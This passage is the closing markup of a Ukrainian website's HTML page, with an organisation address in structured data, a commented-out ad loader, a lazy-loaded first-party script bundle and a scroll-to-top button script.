            "streetAddress": "Київ, вул. Володимирська 61/11, офіс 44",
            "addressLocality": "Київ",
            "addressCountry": "UA"
        }
    }
</script> <script>
        //Commented. task https://jira.luxnet.ua/browse/MAXIMUM-1960
        // if(window.innerWidth > 640){
        //     $.ajax({
        //         type: "GET",
        //         url: "https://a4p.adpartner.pro/media?site_id=9&unit_id=242",
        //         dataType: "script"
        //     });
        // }
    </script>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var gravitecScript = document.createElement('script');
            gravitecScript.src = "https://webvitals.luxnet.ua/js/bundle.js"
            gravitecScript.async
            parentEl[0].appendChild(gravitecScript);
        }, 2500);
    </script>

<div class="toTop">
<div id="toTop">
<img class="toTop-img" src="/assets/images/to_top.png?v=57" style="width: 50px; height: 50px" alt="To top icon">
</div>
</div>
<script>
    $(function() {
        $(window).scroll(function() {
            if($(this).scrollTop() != 0) {
                $('#toTop').fadeIn();
            } else {
                $('#toTop').fadeOut();
            }
        });

        $('#toTop').click(function() {
            $('body,html').animate({scrollTop:0},300);
        });
    });
</script> 
</body>
</html>
